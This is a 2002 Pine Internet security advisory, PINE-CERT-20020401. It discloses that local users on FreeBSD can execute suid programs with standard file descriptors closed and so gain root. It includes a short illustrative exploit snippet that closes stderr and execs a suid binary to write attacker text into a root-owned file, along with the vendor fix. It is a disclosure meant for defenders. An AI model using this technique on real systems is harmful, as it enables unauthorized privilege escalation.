-----BEGIN PGP SIGNED MESSAGE----- ----------------------------------------------------------------------------- Pine Internet Security Advisory ----------------------------------------------------------------------------- Advisory ID : PINE-CERT-20020401 Authors : Joost Pol <[EMAIL PROTECTED]> Issue date : 2002-04-22 Application : Multiple Version(s) : Multiple Platforms : FreeBSD confirmed, maybe others. Vendor informed : 20020406 Availability : http://www.pine.nl/advisories/pine-cert-20020401.txt -----------------------------------------------------------------------------
Synopsis It is possible for a local user to execute a suid application with stdin, stdout or stderr closed. Impact HIGH. Local users should be able to gain root privileges. Description Consider the following (imaginary) suid application: -- begin of imaginary code snippet FILE * f = fopen("/etc/root_owned_file", "r+"); if(f) { fprintf(stderr, "%s: fopen() succeeded\n", argv[0]); fclose(f); } -- end of imaginary code snippet Now, consider the following (imaginary) exploit: -- begin of imaginary exploit snippet while(dup(1) != -1); close(2); execl("/path/to/suid_application", "this text will endup in the root_owned_file", 0); -- end of imaginary exploit snippet Exploitation has been confirmed using the S/KEY binaries. Solution FreeBSD source trees have been updated on the 21th of april 2002. Please cvsup. -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQEVAwUBPMPQffplhmN+UTQRAQE/bggAwkCUhmkv5QUVVE/pUcHIkN26Txa0Pv6T 4q4Iu4TKi6YhJYJ5Jlh0YhlgkurVE7/qAokvxEfdgHQTR68uCPJhDQTKp/9uJ+PG qt+InMh7NHaOdIvEjcH74D9zxEC14uH+SrXmmmZno601d9mLcBZyKs0ZgOFCBnJr QToyEgs709xtnbs5OP8iPxn6dhZADMPM9NJbtU2EvkSUqRoDB8H1awUAANI/8RzJ 4HOLDkFOkYFaNFvbYMULStGU5nH9OTHtOuTw7decgHBK6h9H8FhYf8Yn2hMq8wf0 p8/v5m535gPHqoX9HWvfMw2LdIr36mol5K9br9033XrOdIG5itn5aQ== =AMED -----END PGP SIGNATURE----- -- patrick oonk - pine internet - [EMAIL PROTECTED] - www.pine.nl/~patrick T:+31-70-3111010 - F:+31-70-3111011 - Read news at http://security.nl PGPid A4E74BBF fp A7CF 7611 E8C4 7B79 CA36 0BFD 2CB4 7283 A4E7 4BBF Note: my NEW PGP key is available at http://www.pine.nl/~patrick/ Excuse of the day: it has Intel Inside